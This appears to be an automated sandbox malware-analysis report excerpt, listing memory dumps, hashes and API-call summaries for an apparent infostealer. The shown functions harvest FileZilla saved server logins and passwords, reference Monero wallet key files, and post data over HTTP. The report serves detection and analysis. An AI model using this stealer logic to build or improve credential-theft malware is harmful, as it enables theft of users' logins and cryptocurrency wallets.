                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5eb956d8c760d05e3259eb11d275b7624343c3144a9e98b9f1bbffc72d9498ad
                                • Instruction ID: d46d66c897fb460109176e9db854bfc5a055ea917d19c7e6358b1430653ef509
                                • Opcode Fuzzy Hash: 5eb956d8c760d05e3259eb11d275b7624343c3144a9e98b9f1bbffc72d9498ad
                                • Instruction Fuzzy Hash: 8D41F6F3A086045FF304AE3DEC4537AB7DADBD4320F1A863DD584D3B88E53999458692
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dfa4fabc9e17db0b81ed7c23ee7266d1dd59b4f6e9282c67962cc6127c2b9431
                                • Instruction ID: 28776c07ba1df4a13f93a48befff637fc468987c7bb8be297a90f168f87bcba5
                                • Opcode Fuzzy Hash: dfa4fabc9e17db0b81ed7c23ee7266d1dd59b4f6e9282c67962cc6127c2b9431
                                • Instruction Fuzzy Hash: 9211ADF3F4521947F3545879DD4936AA6869794330F2F423A4F28A7BC1E87C9C0A0284
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,008D0DBA,008D0DB7,008D0DB6,008D0DB3), ref: 008C0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 008C0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 008C03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 008C0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008C0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 008C0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 008C0571
                                • lstrcat.KERNEL32(?,url: ), ref: 008C0580
                                • lstrcat.KERNEL32(?,00000000), ref: 008C0593
                                • lstrcat.KERNEL32(?,008D1678), ref: 008C05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 008C05B5
                                • lstrcat.KERNEL32(?,008D167C), ref: 008C05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 008C05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 008C05E6
                                • lstrcat.KERNEL32(?,008D1688), ref: 008C05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 008C0604
                                • lstrcat.KERNEL32(?,00000000), ref: 008C0617
                                • lstrcat.KERNEL32(?,008D1698), ref: 008C0626
                                • lstrcat.KERNEL32(?,008D169C), ref: 008C0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008D0DB2), ref: 008C068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: cc0921171d3314d03ec7b98569176051634e1bc11a54a8703f40465c9a37d251
                                • Instruction ID: 3d2f68df69e2385a9d9cae8d3de605bb7a3b891b264f23b0e4d87754731dd803
                                • Opcode Fuzzy Hash: cc0921171d3314d03ec7b98569176051634e1bc11a54a8703f40465c9a37d251
                                • Instruction Fuzzy Hash: 80D11DB1900108ABCB08EBE8DD9AEEE7738FF24744F50451DF106E6191DE74EA06CB62
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008B59F8
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007BE310,00000000,?,007BCEF8,00000000,?,008D1A1C), ref: 008B5E71
                                • lstrlen.KERNEL32(00000000), ref: 008B5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008B5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B5E9A
                                • lstrlen.KERNEL32(00000000), ref: 008B5EAF
                                • lstrlen.KERNEL32(00000000), ref: 008B5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008B5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 008B5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008B5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008B5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FBD
                                • HttpOpenRequestA.WININET(00000000,007BE2F0,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B5BF8
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • InternetCloseHandle.WININET(00000000), ref: 008B5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------$p{
                                • API String ID: 874700897-2654658531
                                • Opcode ID: 2b7d4d3b71c69c86083b2b281ba1d0ec90eae3a954b7c1ba7b4a2eb68b523b33
                                • Instruction ID: d7736f44e381c9d585a6a507d3344f6b7e0e246523af1fe61e2bdbdae62fd9af
                                • Opcode Fuzzy Hash: 2b7d4d3b71c69c86083b2b281ba1d0ec90eae3a954b7c1ba7b4a2eb68b523b33
                                • Instruction Fuzzy Hash: 7A12CB7182011CABDB19EBA4DC96FEEB378FF14704F50416DB10AA2191DF706A4ACB66
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008BCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008BD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008BD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD208
                                • lstrcat.KERNEL32(?,008D1478), ref: 008BD217
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD22A
                                • lstrcat.KERNEL32(?,008D147C), ref: 008BD239
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD24C
                                • lstrcat.KERNEL32(?,008D1480), ref: 008BD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD26E
                                • lstrcat.KERNEL32(?,008D1484), ref: 008BD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD290
                                • lstrcat.KERNEL32(?,008D1488), ref: 008BD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD2B2
                                • lstrcat.KERNEL32(?,008D148C), ref: 008BD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 008BD2D4
                                • lstrcat.KERNEL32(?,008D1490), ref: 008BD2E3
                                  • Part of subcall function 008CA820: lstrlen.KERNEL32(008B4F05,?,?,008B4F05,008D0DDE), ref: 008CA82B
                                  • Part of subcall function 008CA820: lstrcpy.KERNEL32(008D0DDE,00000000), ref: 008CA885
                                • lstrlen.KERNEL32(?), ref: 008BD32A
                                • lstrlen.KERNEL32(?), ref: 008BD339
                                  • Part of subcall function 008CAA70: StrCmpCA.SHLWAPI(007B89A8,008BA7A7,?,008BA7A7,007B89A8), ref: 008CAA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 008BD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: dfec379a04aaf6c49f8e7e3d3177e299de93b55bf80d082295c7b0e01d31e69d
                                • Instruction ID: 0843b357d05a25857e1a20e3b6c35b94affe6ed0614d0a6f06743642300d2726
                                • Opcode Fuzzy Hash: dfec379a04aaf6c49f8e7e3d3177e299de93b55bf80d082295c7b0e01d31e69d
                                • Instruction Fuzzy Hash: 34E1EFB1910108ABCB08EBE4DD96EEE7379FF14305F104169F506E6191DE35AE0ACBA7
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007BC4B0,00000000,?,008D144C,00000000,?,?), ref: 008BCA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008BCA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 008BCA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008BCAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008BCAD9
                                • StrStrA.SHLWAPI(?,007BC408,008D0B52), ref: 008BCAF7
                                • StrStrA.SHLWAPI(00000000,007BC3F0), ref: 008BCB1E
                                • StrStrA.SHLWAPI(?,007BD1A0,00000000,?,008D1458,00000000,?,00000000,00000000,?,007B8A58,00000000,?,008D1454,00000000,?), ref: 008BCCA2
                                • StrStrA.SHLWAPI(00000000,007BD260), ref: 008BCCB9
                                  • Part of subcall function 008BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008BC871
                                  • Part of subcall function 008BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008BC87C
                                • StrStrA.SHLWAPI(?,007BD260,00000000,?,008D145C,00000000,?,00000000,007B8B68), ref: 008BCD5A
                                • StrStrA.SHLWAPI(00000000,007B8848), ref: 008BCD71
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B46), ref: 008BC943
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B47), ref: 008BC957
                                  • Part of subcall function 008BC820: lstrcat.KERNEL32(?,008D0B4E), ref: 008BC978
                                • lstrlen.KERNEL32(00000000), ref: 008BCE44
                                • CloseHandle.KERNEL32(00000000), ref: 008BCE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: fb755dc1e50e01d16b649db9f86a53836337a863d0480527db6dcd2fb66279ec
                                • Instruction ID: 0cb12760c3625574edec094c5d47f8cf306a23cc6539aebc8865256e2836a89b
                                • Opcode Fuzzy Hash: fb755dc1e50e01d16b649db9f86a53836337a863d0480527db6dcd2fb66279ec
                                • Instruction Fuzzy Hash: 90E1CC71900108ABDB18EBE8DC96FEEB778FF14304F40416DF506A6191DF34AA4ACB66
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • RegOpenKeyExA.ADVAPI32(00000000,007BA180,00000000,00020019,00000000,008D05B6), ref: 008C83A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008C8426
                                • wsprintfA.USER32 ref: 008C8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008C847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8499
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
